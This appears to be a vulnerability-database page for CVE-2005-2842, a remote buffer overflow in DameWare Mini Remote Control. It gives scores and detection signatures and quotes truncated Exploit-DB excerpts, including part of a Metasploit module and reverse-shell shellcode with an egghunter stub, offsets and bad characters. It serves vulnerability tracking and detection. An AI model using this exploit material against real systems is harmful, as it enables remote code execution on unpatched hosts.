CVE-2005-2842
published 2005-09-08CVE-2005-2842: Buffer overflow in dwrcs.exe in DameWare Mini Remote Control before 4.9.0 allows remote attackers to execute arbitrary code via the username.
PriorityP351high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
21.12%
97.3th percentile
Buffer overflow in dwrcs.exe in DameWare Mini Remote Control before 4.9.0 allows remote attackers to execute arbitrary code via the username.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dameware_development | mini_remote_control_server | — | — |
| dameware_development | mini_remote_control_server | — | — |
| dameware_development | mini_remote_control_server | — | — |
| dameware_development | mini_remote_control_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x30\x11\x00\x00\x00\x00\x00\x00\xd7\xa3\x70\x3d\x0a\xd7\x0d\x40
bytes↗
\x30\x11\x00\x00\x00\x00\x00\x00\xC3\xF5\x28\x5C\x8F\xC2\x0D\x40
bytes↗
\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x41\x42\x41\x42\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7
- →Exploit sends an oversized username (259-byte buffer with EIP overwrite at offset 100) to port 6129/TCP on dwrcs.exe; detect abnormally large username fields in DameWare protocol traffic on this port. ↗
- →Exploit packet begins with the 4-byte magic header \x30\x11\x00\x00 at offset 0; this is a reliable network signature for both known exploit variants targeting CVE-2005-2842. ↗
- →Egghunter tag \x41\x42\x41\x42 (ABAB) is used as the egg marker in the shellcode; scanning process memory or network payloads for this tag alongside the egghunter stub can identify exploitation attempts. ↗
- →BadChars for the payload are \x00\x0a\x0d; any payload on port 6129 containing long runs of non-null bytes without these characters in the username field should be treated as suspicious. ↗
- ·The Metasploit module targets only Windows XP SP3 EN with a single hardcoded return address; the standalone exploit (EDB-1190) includes additional offsets for WIN 2000, WIN 2003, and WIN NT4 but several are marked unknown/placeholder. ↗
- ·The standalone exploit author notes the return address offsets 'Could proberly be doing with some better offsets', indicating reliability issues on some target OS versions. ↗
- ·Payload compatibility requires the ws2ord symbol lookup method; standard reverse shells not using ws2_32 ordinal resolution will fail. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Dameware Mini Remote Control 4.0 - Username Stack Buffer Overflow (Metasploit)
exploitdb·2017-09-13
CVE-2005-2842 Dameware Mini Remote Control 4.0 - Username Stack Buffer Overflow (Metasploit)
Dameware Mini Remote Control 4.0 - Username Stack Buffer Overflow (Metasploit)
---
require 'msf/core'
class MetasploitModule 'Dameware Mini Remote Control Username Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow vulnerability found
in Dameware Mini Remote Control v4.0. The overflow is caused when sending
an overly long username to the DWRCS executable listening on port 6129.
The username is read into a strcpy() function causing an overwrite of
the return pointer leading to arbitrary code execution.
},
'Author' => [ 'James Fitts' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'CVE', '2005-2842' ],
[ 'BID', '14707' ],
[ 'URL', 'http://secunia.com/advisories/16655' ],
[ 'URL', 'http://archives.neohapsis.com/arch
Exploit-DB
DameWare Mini Remote Control 4.0 < 4.9 - Client Agent Remote Overflow
exploitdb·2005-08-31
CVE-2005-2842 DameWare Mini Remote Control 4.0 < 4.9 - Client Agent Remote Overflow
DameWare Mini Remote Control 4.0
#include
#include
#pragma comment(lib,"ws2_32")
#define ACCEPT_TIMEOUT 25
#define RECVTIMEOUT 15
#define UNKNOWN 0
#define WIN2K 1
#define WINXP 2
#define WIN2K3 3
#define WINNT 4
unsigned char rshell[] = {
"\x41\x42\x41\x42\x41\x42\x41\x42\x90\x90\x90\x90\x90\x90\x90\x90"// For The Egghunter
"\x90\xFC\x6A\xEB\x52\xE8\xF9\xFF\xFF\xFF\x60\x8B\x6C\x24\x24\x8B"// Reverse Shell
"\x45\x3C\x8B\x7C\x05\x78\x01\xEF\x83\xC7\x01\x8B\x4F\x17\x8B\x5F"
"\x1F\x01\xEB\xE3\x30\x49\x8B\x34\x8B\x01\xEE\x31\xC0\x99\xAC\x84"
"\xC0\x74\x07\xC1\xCA\x0D\x01\xC2\xEB\xF4\x3B\x54\x24\x28\x75\xE3"
"\x8B\x5F\x23\x01\xEB\x66\x8B\x0C\x4B\x8B\x5F\x1B\x01\xEB\x03\x2C"
"\x8B\x89\x6C\x24\x1C\x61\xC3\x31\xC0\x64\x8B\x40\x30\x8B\x40\x0C"
"\x8B\x70\x1C\xAD\x8B\x40\x08\x5E\x68\x8E\x4E\x0E\x
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2005-08/1074.htmlhttp://secunia.com/advisories/16655http://securitytracker.com/id?1014830http://www.jpno5.com/Releases/Public/Exploits/Dameware%20Mini%20Remote%20Control%20Exploit/dameware.txthttp://www.kb.cert.org/vuls/id/170905http://www.securityfocus.com/bid/14707http://www.vupen.com/english/advisories/2005/1596https://www.exploit-db.com/exploits/42703/http://archives.neohapsis.com/archives/fulldisclosure/2005-08/1074.htmlhttp://secunia.com/advisories/16655http://securitytracker.com/id?1014830http://www.jpno5.com/Releases/Public/Exploits/Dameware%20Mini%20Remote%20Control%20Exploit/dameware.txthttp://www.kb.cert.org/vuls/id/170905http://www.securityfocus.com/bid/14707http://www.vupen.com/english/advisories/2005/1596https://www.exploit-db.com/exploits/42703/
2005-09-08
Published